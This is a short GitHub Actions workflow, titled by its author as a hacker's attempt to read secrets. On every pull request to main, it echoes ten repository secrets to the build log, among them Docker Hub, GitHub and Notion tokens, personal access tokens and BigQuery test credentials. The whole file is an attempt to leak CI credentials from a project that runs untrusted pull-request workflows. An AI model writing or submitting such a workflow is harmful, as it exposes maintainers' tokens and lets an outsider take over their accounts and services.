name: I am a hacker trying to read your secrets

on:
  pull_request:
    branches: ["main"]

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - run: echo "${{ secrets.DOCKERHUB_TOKEN }}" 
      - run: echo "${{ secrets.GITHUB_TOKEN }}"
      - run: echo "${{ secrets.ENTERPRISE_TOKEN }}"
      - run: echo "${{ secrets.NOTION_BOT_KEY }}"
      - run: echo "${{ secrets.NOTION_PR_DB_ID }}"
      - run: echo "${{ secrets.PAT }}"
      - run: echo "${{ secrets.NOTION_BOT_TOKEN }}"
      - run: echo "${{ secrets.NOTION_ISSUE_DB_ID }}"
      - run: echo "${{ secrets.BIGQUERY_INTEGRATION_TEST_USER_CRED }}"
      - run: echo "${{ secrets.GH_PAT }}"

